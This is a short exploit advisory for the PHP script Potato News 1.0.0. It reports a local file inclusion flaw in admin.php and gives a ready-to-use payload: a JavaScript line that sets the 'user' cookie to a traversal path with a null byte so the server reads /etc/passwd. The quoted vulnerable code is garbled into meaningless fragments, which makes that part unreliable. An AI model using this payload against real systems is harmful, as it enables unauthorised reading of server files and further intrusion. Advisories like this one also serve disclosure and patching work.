######################################################################################### [0x01] Informations: Name : Potato News 1.0.0 Download : http://potato-news.googlecode.com/files/potatonews-1.0.0.zip Vulnerability : LFI Author : x0r Contact : andry2000@hotmail.it Notes : Proud to be Italian ######################################################################################### [0x02] Bug: Bugged file is /[path]/admin.php [Code] "; } else { echo "

"; } } [/code] ######################################################################################### [0x03] Exploit: Exploit: javascript:document.cookie = "user=../../../../../../../../../../etc/passwd%00; path=/" ########################################################################################